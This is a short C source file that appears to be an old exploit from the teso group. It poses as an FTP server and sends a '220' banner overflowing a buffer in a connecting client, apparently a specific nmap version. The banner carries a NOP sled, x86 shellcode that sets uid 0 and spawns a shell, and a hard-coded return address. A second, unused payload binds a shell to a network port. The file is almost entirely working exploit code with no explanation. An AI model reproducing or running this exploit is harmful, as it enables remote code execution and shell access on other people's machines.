/* mad teso ftp://ftp.saurik.com/pub/nmap/nmap-2.53+V-1.01.tgz ninja warez */
/* (nonreleased, but not) private (anymore). -typo */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET 0xbffb8afc
#define LEN 2072

unsigned char x86_local[] =
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1e\x5b\x31\xc0\x88\x43"
    "\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80"
    "\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21\x21";

unsigned char   x86_listen[] =
    "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x7c\x31\xc0\xfe\xc0\xcd\x80"
    "\x5f\x89\x4f\x10\xfe\xc1\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f"
    "\x08\xfe\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66\x89\x5f"
    "\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16\x89\x57\x18\x8d\x4f\x14"
    "\x89\x4f\x0c\x8d\x4f\x08\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe"
    "\xc3\xb0\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0\x66\xcd"
    "\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\xfe"
    "\xc1\xb0\x3f\xcd\x80\x31\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d"
    "\x4f\x0c\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8\x7e\xff"
    "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

char *shellcode = x86_local;

int main(int argc, char *argv[]) {
    char x[LEN+1];
    int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
    int eob    = argc > 2 ? atoi(argv[2]) : LEN;

    printf("220 teso FTP server (Version ");

    memset(x, 0x90, sizeof(x));
    memcpy(x + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    memcpy(x + eob - 4, (void *) &offset, sizeof(offset));
    x[eob] = '\0';

    printf("%s) ready.\n", x);
    exit(EXIT_SUCCESS);
}